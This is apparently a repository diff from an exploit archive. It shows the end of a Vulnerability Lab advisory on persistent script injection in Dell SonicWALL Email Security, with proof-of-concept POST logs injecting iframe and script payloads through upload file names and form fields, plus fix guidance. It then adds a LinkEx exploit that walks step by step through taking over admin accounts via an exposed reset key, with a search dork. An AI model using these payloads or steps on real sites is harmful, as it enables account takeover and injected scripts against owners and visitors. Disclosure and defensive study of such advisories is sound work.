||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
|
||||||
|
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="sortFiles"
|
||||||
|
|
||||||
|
false
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="smtpBanner"
|
||||||
|
|
||||||
|
><><iframe src=http://www.vulnerability-lab.com/> ;)
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="receivedBy"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="dnsTimeout"
|
||||||
|
|
||||||
|
2
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="fullHistoryAgeDays"
|
||||||
|
|
||||||
|
10
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="whiteListSelf"
|
||||||
|
|
||||||
|
true
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="fullHistoryInbound"
|
||||||
|
|
||||||
|
false
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="fullHistoryOutbound"
|
||||||
|
|
||||||
|
false
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="logLevel"
|
||||||
|
|
||||||
|
fatal
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="dbAging"
|
||||||
|
|
||||||
|
366
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="snmpOn"
|
||||||
|
|
||||||
|
true
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="snmpComStr"
|
||||||
|
|
||||||
|
snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
|
||||||
|
-----------------------------213272019431414
|
||||||
|
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
|
||||||
|
URL: Input
|
||||||
|
http://ess.localhost:8619/settings_dlicense.html
|
||||||
|
|
||||||
|
URL: Execute
|
||||||
|
http://ess.localhost:8619/settings_upload_dlicense.html
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
|
||||||
|
|
||||||
|
Status: 200[OK]
|
||||||
|
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[esserver.demo.sonicwall.com]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
|
||||||
|
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D;
|
||||||
|
JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.
|
||||||
|
1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1.
|
||||||
|
1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.|
|
||||||
|
1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------281841889227097
|
||||||
|
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
Both vulnerabilities can be patched by a secure parse and encode of the file name value in the 2 affected upload POST method requests.
|
||||||
|
Filter and encode also in the wait.html and license exception the vulnerable output values even if the input is still parsed.
|
||||||
|
|
||||||
|
|
||||||
|
SonicWall Solution:
|
||||||
|
============
|
||||||
|
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users.
|
||||||
|
Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel
|
||||||
|
in the left-hand navigation, then select “Email Security” in the Software Type drop down menu.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the persistent and non persistent post inject web vulnerabilities are estimated as medium.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||||
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||||
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||||
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||||
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||||
|
or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||||
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||||
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||||
|
DOMAIN: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
|
||||||
|
|
28
platforms/php/webapps/32561.txt
Executable file
28
platforms/php/webapps/32561.txt
Executable file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: LinEx All Versions Password Reset Vulnerability
|
||||||
|
# Google Dork: linkex.dk 2006-2011
|
||||||
|
# Date: 15/01/2014
|
||||||
|
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
|
||||||
|
# Vendor Homepage: http://linkex.dk/
|
||||||
|
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
|
||||||
|
# Version: All Versions
|
||||||
|
|
||||||
|
|
||||||
|
LinkEx Is A Open Source Web Application For Exchanging link , Which Most
|
||||||
|
Of The Porn Sites Uses it ,
|
||||||
|
|
||||||
|
1) First GO Here http://site.com/linkex/?page=admin
|
||||||
|
2) Click On Forgot password and enter the captcha
|
||||||
|
3) Go Here >> site.com/linkex/data/config/config
|
||||||
|
Note down the " key " parameter
|
||||||
|
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
|
||||||
|
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
|
||||||
|
5) Thats It U Will Asked For New Username And Password
|
||||||
|
|
||||||
|
|
||||||
|
Shouts to :- | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
|
||||||
|
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
|
||||||
|
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |
|
||||||
|
|
||||||
|
--
|
||||||
|
Regards
|
||||||
|
N B Sri Harsha
|
Loading…
Add table
Reference in a new issue